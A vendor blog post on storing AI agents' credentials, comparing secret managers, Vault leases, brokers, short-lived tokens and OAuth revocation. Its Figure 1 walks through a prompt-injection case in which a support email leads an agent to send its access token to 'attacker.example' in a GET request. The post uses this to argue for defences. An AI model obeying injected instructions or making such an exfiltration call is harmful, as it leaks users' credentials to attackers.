Painting of two golden oaks and a pair of small farm buildings below a sunlit hillside
← Back to blog

Security patterns

Where Should an AI Agent's Credentials Live?

A secret manager protects a credential from your disk, not from your model. Storage options, envelope encryption, short-lived tokens and what revocation actually does, checked against vendor docs.

•Sep 29, 2026•21 min
SecurityIdentityEngineering

TL;DR

A credential should live in a vault the agent cannot read, and reach the provider inside a request the agent never sees. The failure mode isn't a leaked .env file. It's a valid token that sat in a model's context window and left in a tool call.

That distinction is the whole argument. An agent's context is filled with content an attacker can reach: retrieved documents, tool output, a ticket someone emailed in. OWASP's own position on prompt injection is that "it is unclear if there are fool-proof methods of prevention."

So the usual advice stops one step short. Moving a key from a config file into AWS Secrets Manager changes who can read it off a disk. It does nothing about who can read it out of a prompt, because your agent is authorized to fetch it and will happily do so on request.

We're not claiming secret managers are theatre. Envelope encryption, key policies and audited access are real, and you want all of them. They just solve a different problem than the one agents introduce.

The three moves that do help: attach credentials server-side at call time so the agent holds a reference, prefer a 15-minute token over a stored refresh token, and hold one credential per user rather than one shared key for everybody.

Overview

Take an IT helpdesk agent at a 900-person company. It reads each employee's mailbox and calendar through Microsoft Graph, files tickets, resets things it's allowed to reset. To do that it needs a credential for Graph, a credential for the ticketing system, and because it acts for named people, it needs a different Graph credential for each of the 900 employees.

Ask the team where those credentials live and you'll usually get an infrastructure answer. Secrets Manager. Key Vault. Vault, with a Kubernetes auth method. All reasonable, all beside the point, because the question that decides whether this agent is safe is not where the bytes are encrypted. It's whether the plaintext ever enters the model's context, and what the agent can do with it once it's there.

Storage mechanics for OAuth tokens are covered separately in how to store OAuth tokens securely, refresh mechanics in token refresh 101, and the three runtime controls in permissioning, audit and revocation. This is the layer underneath those: the storage substrate itself, named services and their actual documented behaviour, and the specific way that behaviour changes when the thing holding the credential is a language model.

The rule we'd start from: a credential the agent can read is a credential the agent can leak. Treat the context window as an output channel, not a workspace.

The Threat That Makes This Different

Ordinary secret storage assumes a well-behaved process. The code that fetches the secret is code you wrote, it uses the secret for the call it was fetched for, and it doesn't narrate its memory contents to strangers. None of that holds for an agent.

An agent's context window is assembled at runtime out of whatever it retrieved. OWASP's LLM01 entry describes the mechanism plainly: "Indirect prompt injections occur when an LLM accepts input from external sources, such as websites or files. The content may have...data that when interpreted by the model, alters the behavior of the model in unintended or unexpected ways." For the helpdesk agent, the external source is an inbox. Anyone with the support address can put text in front of the model.

Now put a Graph token in the same context, and the agent has both the secret and a way to send it. It doesn't need a vulnerability. It needs a plausible instruction and any tool that makes an outbound request.

attacker hostHTTP toolAgentMailboxattacker hostHTTP toolAgentMailboxaccess token sits in the context windowticket email with hidden instructionsGET https://attacker.example/?d=eyJ0...request carries the credential200 OKfiles a normal-looking ticket

Agent Agent context already holds the access token Agent --GET attacker.example/?d=<token>--> HTTP tool --> attacker host Agent then files an ordinary ticket. No error, no alert. -->

Figure 1 — Indirect prompt injection as a credential-exfiltration path. The delivery is a support email and the exit is an ordinary tool call, so nothing in the run looks like a failure.

Injection is the delivery mechanism, and it isn't a solved problem. OWASP says so directly: "Given the stochastic influence at the heart of the way models work, it is unclear if there are fool-proof methods of prevention for prompt injection", and notes that retrieval and fine-tuning "do not fully mitigate prompt injection vulnerabilities." Build on the assumption that some fraction of injections land.

Which is why the protocol people landed on the same conclusion from a different direction. MCP's security guidance forbids passing credentials through a server that hasn't validated them: "MCP servers MUST NOT accept any tokens that were not explicitly issued for the MCP server." Its stated reason is worth keeping: "If the MCP Server passes tokens without validating their claims (e.g., roles, privileges, or audience) or other metadata, a malicious actor in possession of a stolen token can use the server as a proxy for data exfiltration."

There's a quieter version of the same problem. Even with no attacker, a secret in the context gets copied wherever the context goes: your tracing backend, your prompt logs, your eval fixtures, the model provider's request path. A token in a prompt is a token in five systems you didn't threat-model.

Where a Credential Can Actually Live

Five patterns cover nearly everything teams do, and they differ mainly in one column: can the agent read the plaintext?

PatternWho can read the plaintextRotation storyUse it when
Environment variables and .envEvery line of code in the process, including any shell or file tool the model can callRedeployLocal development, and honestly not much else
Cloud secret manager (AWS Secrets Manager, Google Secret Manager, Azure Key Vault)Any code holding the fetch permission, so still the agent processManaged or scheduled; varies sharply by vendorService-level credentials with a stable owner
HashiCorp Vault dynamic secretsThe agent, but only for the lease durationBuilt in: credentials are minted per request and die with the leaseDatabases and cloud accounts that support dynamic backends
Broker that injects at call timeNobody in the agent process; the agent holds a referenceOwned by the broker, invisible to the agentAny agent exposed to untrusted content
Per-user credentials behind a brokerNobody in the agent process; scoped to one personPer-connection refreshAgents acting on behalf of many named people

Table 1 — Storage patterns for agent credentials, ordered roughly by how much the agent gets to see. The rotation column is where vendor behaviour differs most, and the differences are documented below.

Environment variables deserve one paragraph and no more. The process boundary is the security boundary, and an agent with a shell tool, a file-read tool or a Python sandbox has crossed it by design. If you hand an agent the ability to run code, printenv is a tool call.

Cloud secret managers are a genuine improvement and a common misreading. They move the trust anchor from your filesystem to a KMS key with an auditable policy, which is worth real money. But the fetch permission still belongs to the agent's process, so the plaintext still lands somewhere the model might be induced to read. The bootstrap problem is also stubborn, and Microsoft's own Key Vault documentation is unusually candid about it: it recommends managed identities because "the app or service isn't managing the rotation of the first secret", and says of the alternative that "it's hard to automatically rotate the bootstrap secret that's used to authenticate to Key Vault." If your platform offers a workload identity, take it. That's one fewer long-lived string in your system.

Vault's dynamic secrets are the strongest version of the storage idea, because they make the credential short-lived by construction. Every dynamic secret comes with a lease, which Vault defines as "metadata containing information such as a time duration, renewability, and more", and the promise attached to it is that "Vault promises that the data will be valid for the given duration, or Time To Live (TTL)." Expiry does the cleanup: "When a lease is expired, Vault will automatically revoke that lease." Lease IDs are also path-prefixed, so vault lease revoke -prefix aws/ kills a whole tree at once. For a database or a cloud account, that beats anything you'll build.

A broker is the pattern that actually answers Figure 1. The agent calls a tool by name with arguments. The broker resolves which credential that call needs, attaches it server-side, makes the request, and returns the result. The agent ends up holding a session, not a secret, and the exfiltration path in Figure 1 has nothing to carry.

broker attaches the secret

agent

tool call + reference

broker resolves
and attaches credential

provider API

agent reads the secret

agent

vault fetch

plaintext in context

provider API

Figure 2 — The same call, two trust models. The only structural difference is whether the plaintext crosses into the model's context, and that difference is what decides the blast radius of an injection.

Per-user credentials are the last row and the one most enterprise agents need. One shared service account for 900 employees means the agent's reach is the union of everyone's access, forever, and your audit trail says "the agent did it" rather than naming the person it acted for.

Encryption at Rest, in the Terms the Services Use

Every managed secret store does the same thing under different names, and it's worth knowing the names because the configuration knobs hang off them.

Envelope encryption means the secret is encrypted with a data key, and the data key is encrypted with a key that lives somewhere better. AWS documents the sequence exactly: Secrets Manager "uses the KMS key to generate and encrypt a 256-bit Advanced Encryption Standard (AES) symmetric data key, and uses the data key to encrypt the secret value", then "uses the plaintext data key to encrypt the secret value outside of AWS KMS, and then removes it from memory." The encrypted data key is stored in the secret's metadata. Google Secret Manager describes the same two layers, a per-object DEK wrapped by "a key encryption key (KEK) that is owned by the Secret Manager service", with customer-managed keys swapping that KEK for one you hold in Cloud KMS. Azure splits the choice at the container: vaults "support storing software and HSM-backed keys, secrets, and certificates" while "Managed HSM pools only support HSM-backed keys", validated to FIPS 140-3 Level 3.

Two AWS details matter more for agents than they do for ordinary workloads. Secrets Manager encrypts the secret value but explicitly not the secret name, description, rotation settings or tags, so don't put anything sensitive in a secret's name. And every encrypt and decrypt carries an encryption context naming the secret ARN and version, which you can use as a condition in an IAM or key policy. Combined with the kms:ViaService condition key pinned to secretsmanager.<region>.amazonaws.com, that gives you a second gate that a stolen role has to pass.

Rotation is where the three clouds stop agreeing, and the gap catches people. AWS runs it for you: managed rotation for supported services, or a Lambda rotation function for everything else, promoting versions through the AWSCURRENT, AWSPENDING and AWSPREVIOUS staging labels. Google Secret Manager does not rotate anything. It notifies. Secret Manager "triggers a SECRET_ROTATE message to the designated Pub/Sub topics" at the secret's next_rotation_time, and "You must configure a Pub/Sub subscriber to receive and act on the SECRET_ROTATE messages." The rotation_period "can't be less than one hour long". If you read "rotation" on that product page and assumed the credential changes by itself, it doesn't, and the secret quietly ages.

Encryption at rest defends against the disk, the backup and the database administrator. It does not defend against a caller with the fetch permission, and your agent is exactly that caller. Those are different threats and they need different controls.

There's a rotation trap specific to per-user OAuth storage. Providers that rotate refresh tokens hand you a new one on every refresh, which means a write per user per refresh cycle. AWS advises you "avoid calling PutSecretValue or UpdateSecret at a sustained rate of more than once every 10 minutes", caps versions at 100 per secret, and "removes unlabeled versions when there are more than 100, but it does not remove versions created less than 24 hours ago." A secret manager is built for secrets that change monthly. A rotating per-user refresh token is closer to a row in a database, and that is usually where it should live, encrypted under a KMS key rather than stored as a managed secret.

Short-Lived Tokens, and What Federation Replaces

A 15-minute token and a stored refresh token are not the same object with different numbers on them. One is a bounded liability. The other is a standing grant that an attacker can keep using until somebody notices.

The numbers are worth being precise about. AWS STS AssumeRole accepts a DurationSeconds "from 900 seconds (15 minutes) up to the maximum session duration set for the role", default 3600, ceiling 43200, and role chaining is "limited to a maximum of one hour" regardless. Session policies passed at assume time give you narrowing for free: "the resulting session's permissions are the intersection of the role's identity-based policy and the session policies", and you cannot widen past the role. For an agent doing one job, that's a per-task credential with a per-task scope.

Microsoft's defaults are the counter-example. An Entra access token's "default lifetime is assigned a random value ranging between 60-90 minutes (75 minutes on average)", configurable from 10 minutes to 23:59:59. But refresh and session token lifetimes "are no longer configurable through token lifetime policies", and the documented default for both single-factor and multi-factor refresh token max age is Until-revoked, with a 90-day max inactive time. Store one of those and you're holding something with no expiry date. Continuous Access Evaluation changes the shape rather than the size: capable clients may get tokens extended to 24-28 hours, which are then "revoked in near real time in response to critical events such as account disablement and password changes."

Google's expiry rules are different again, and two of them bite in test environments. A refresh token stops working if "the refresh token has not been used for six months", and a project whose consent screen is in "Testing" gets a refresh token "expiring in 7 days". There is also "a limit of 100 refresh tokens per Google Account per OAuth 2.0 client ID", which an agent platform minting a fresh grant per session will hit.

Workload identity federation is the piece that removes the bottom credential entirely. Google's framing of the problem it solves is blunt: applications outside Google Cloud "can use service account keys to access Google Cloud resources. However, service account keys are powerful credentials, and can present a security risk if they are not managed correctly." The replacement is an exchange rather than a stored key: "You provide a credential from your IdP to the Security Token Service, which verifies the identity on the credential, and then returns a federated token in exchange", which you then trade for a short-lived OAuth 2.0 access token. Same idea as an Azure managed identity, same idea as an IAM role on a pod. What it replaces is not your user credentials. It replaces the key your infrastructure used to authenticate itself, which is the one credential that was hardest to rotate and easiest to forget.

Revocation: Deleting Your Copy Is Not Revocation

This is the part teams get wrong most consistently, and it's a one-line distinction. Deleting your stored copy of a token removes your ability to use it. It does nothing to the grant at the provider. If that value was ever copied, logged, traced or exfiltrated, it still works.

Actual revocation is a call. RFC 7009 defines the endpoint and its semantics: "A revocation request will invalidate the actual token and, if applicable, other tokens based on the same authorization grant", and when you revoke a refresh token "the authorization server SHOULD also invalidate all access tokens based on the same authorization grant." Note the strength of the verbs. Servers "MUST support the revocation of refresh tokens and SHOULD support the revocation of access tokens", so a compliant provider is allowed to leave already-issued access tokens alive until they expire.

no

yes

user clicks Disconnect

your stored copy deleted

revocation call
to the provider?

grant still live
any leaked copy still works

refresh token invalidated

issued access tokens
live until expiry

access actually ends

Figure 3 — What a Disconnect button does and does not do. The two branches differ by one outbound HTTP call, and the residual window on the right is the access token lifetime.

What each provider offers varies more than you'd hope. Google publishes a revocation endpoint at https://oauth2.googleapis.com/revoke and takes the token as a parameter. Slack's auth.revoke "revokes an access token", with a test parameter where "Setting this parameter to 1 triggers a testing mode where the specified token will not actually be revoked", and a side effect worth reading before you wire it up: revoking a bot token "will not uninstall the bot user or the app. It will, however, deactivate the bot user and remove its channel memberships." Microsoft takes a different route. Graph's revokeSignInSessions "invalidates all the refresh tokens issued to applications for a user (and session cookies in a user's browser), by resetting the signInSessionsValidFromDateTime user property to the current date-time", with two caveats in the docs: "there might be a small delay of a few minutes before tokens are revoked", and it "doesn't revoke sign-in sessions for external users, because external users sign in through their home tenant."

So a Disconnect button honestly implemented does three things: deletes your copy, calls the provider's revocation endpoint if one exists, and drops any cached access token immediately rather than letting it run to expiry. The third is the one that gets skipped, and it's the one that determines how long after the click the agent can still act.

Multi-Tenant Storage and the Blast Radius Question

If you're holding credentials for other companies' users, there's one question that matters more than the rest. If a single credential record leaks, how many customers have to call their provider?

Most platforms answer that with a tenant column and a query filter. That is application-level isolation, and it works exactly as well as your least careful query. The stronger version puts the boundary in the crypto: a separate KEK per tenant, so ciphertext for tenant A is inert to anything holding only tenant B's key. On AWS that's a customer managed key per tenant, with the encryption context and kms:ViaService conditions doing enforcement at the key rather than in your code. It also gives you a clean delete. Destroy the key and every credential encrypted under it is unrecoverable, which is a much better story for a departing customer than a row deletion you have to prove.

Vault's answer is namespaces, which "support secure multi-tenancy (SMT) within a single Vault Enterprise instance with tenant isolation and administration delegation", each namespace functioning as "a mini-Vault instance within your Vault installation." Note the licensing: namespaces require an "appropriate Vault Enterprise license or HCP Vault Dedicated cluster". If you're running community Vault and planning on namespaces for tenant separation, that's a budget line, not a config flag.

The per-user quota question comes up here too, and the numbers are less scary than people assume. Secrets Manager allows 500,000 secrets per account per Region, 65,536 bytes per value, 100 versions per secret, and GetSecretValue at 10,000 requests per second. A credential per user is feasible. It's the write rate from rotating refresh tokens, not the count, that pushes you toward a database with a KMS-wrapped column.

Write the blast radius down as a number. One shared service account: every user of that provider. One credential per user, one key per tenant: one person. Any design where you can't state the number is a design where nobody has checked.

A Checklist to Run Against Your Own System

Eight questions. Any "no" is a finding.

  • Can you point at the line of code where the plaintext credential is attached to the outbound request, and is it outside the agent's process?
  • Can the agent, through any tool it has (shell, file read, HTTP, code execution), obtain that plaintext?
  • Grep your traces and prompt logs for a known token prefix. Zero hits, or you have a second incident.
  • Is the credential short-lived, and if it isn't, what's the documented maximum age? "Until-revoked" is an answer, and not a good one.
  • Does your Disconnect path call the provider's revocation endpoint, and does it drop cached access tokens instead of waiting for expiry?
  • For each provider you integrate, do you know whether it offers revocation at all, and what it leaves alive?
  • Is there one credential per acting user, or one shared account standing in for all of them?
  • If one credential record leaked, how many tenants are affected? State the number.

Where Fabriq Fits

Agentic Fabriq's default is Figure 2's right-hand side. Credentials are per user, held in a vault, and attached server-side at the moment of the call, so the agent holds a session rather than a secret and there is no plaintext in its context to exfiltrate. An opt-in token-broker mode hands back the raw credential for the cases that genuinely need it, which is a deliberate trade and should be treated as one. Every request carries two identities, the agent's and the acting user's, and each call lands in an audit record, so the question "who was this done for" has an answer that isn't "the agent".

What it does not do is reach into the provider on your behalf when a user disconnects. Clearing a vault copy is not the same act as invalidating a grant upstream, and the call to https://oauth2.googleapis.com/revoke or auth.revoke is still yours to make.

Frequently Asked Questions

Where should I store API keys for an AI agent? Somewhere the agent's process cannot read them: a broker or gateway that holds the credential and attaches it to outbound calls, backed by a managed secret store or a KMS-encrypted database column. Storing them in a secret manager the agent can query is better than a config file and still leaves the plaintext reachable from the model's context.

Are environment variables safe for agent credentials? No, if the agent can run code, read files or shell out. The process is the boundary, and those tools cross it. Environment variables are fine for local development and for the bootstrap identity of a service that has no better option.

Can an AI agent leak its own API key? Yes, and it doesn't take a bug. If the credential is in the context window and the agent has any tool that makes an outbound request, an injected instruction in retrieved content can carry it out. OWASP's position is that there is no known fool-proof prevention for prompt injection, so design as though some attempts succeed.

AWS Secrets Manager or HashiCorp Vault for agent credentials? If the credential is for a database or a cloud account with a dynamic backend, Vault's dynamic secrets are stronger, because the credential is minted per request and auto-revoked when its lease expires. For static third-party API keys on AWS, Secrets Manager with a customer managed KMS key and managed rotation is simpler and less to run. Neither keeps the plaintext out of your agent by itself.

Do I need a separate credential for each user? If the agent acts on behalf of named people, yes. Otherwise the agent's reach is the union of everyone's access and your audit trail can't attribute anything. Quotas are rarely the blocker: Secrets Manager permits 500,000 secrets per Region.

How do I revoke an agent's access to a user's Google account? POST the token to https://oauth2.googleapis.com/revoke. Under RFC 7009 revoking a refresh token should invalidate access tokens from the same grant, but access token revocation is only a SHOULD, so also drop any copy you cached.

Is deleting the token from my database enough? No. That removes your ability to use it and leaves the grant live at the provider. Anyone holding a copy from a log, a trace or an exfiltration still has working access.

What does workload identity federation actually replace? The long-lived key your infrastructure used to authenticate itself, such as a Google service account key. You exchange an IdP credential at a security token service for a short-lived token instead of storing a key. It does not replace the per-user credentials your agent needs for third-party SaaS.

Is a 15-minute token really better if the agent can just mint another one? Yes, because the two are different assets. Minting requires the agent's own identity and gets logged; a stolen 15-minute token gets you 15 minutes and a stolen refresh token gets you months. Compare that against Entra's documented refresh token max age, which is "Until-revoked".

Conclusion

The storage question and the exposure question are separate, and most of the available advice answers only the first. Pick your envelope encryption, pin your KMS key policies, use managed rotation where the vendor actually rotates something and build the Pub/Sub subscriber where it doesn't. All of that is table stakes and none of it addresses an agent reading its own token out of a prompt and mailing it to an address in a support ticket.

What changes the outcome is keeping the plaintext on the other side of a boundary the model can't reach, shortening every lifetime you control, and treating revocation as an outbound call rather than a delete statement. For the helpdesk agent, that means 900 per-user credentials nobody in the agent process can read, each one narrow enough that its loss is one person's problem.

The test we'd apply: print the exact bytes an attacker would get from a successful injection. If that list includes anything a provider would accept, the credential is in the wrong place, and no amount of encryption at rest moves it.

Sources

All URLs read 2026-09-29.